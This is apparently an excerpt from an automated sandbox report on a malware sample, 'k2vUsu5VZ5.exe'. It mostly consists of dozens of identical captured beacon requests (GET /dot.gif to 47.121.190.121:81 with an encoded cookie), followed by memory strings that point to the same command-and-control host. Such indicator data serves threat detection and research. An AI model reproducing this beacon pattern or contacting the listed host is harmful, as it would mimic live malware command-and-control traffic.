            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: k2vUsu5VZ5.exe, 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577505037.000000000083F000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.0000000000836000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2600913090.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif1
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif1
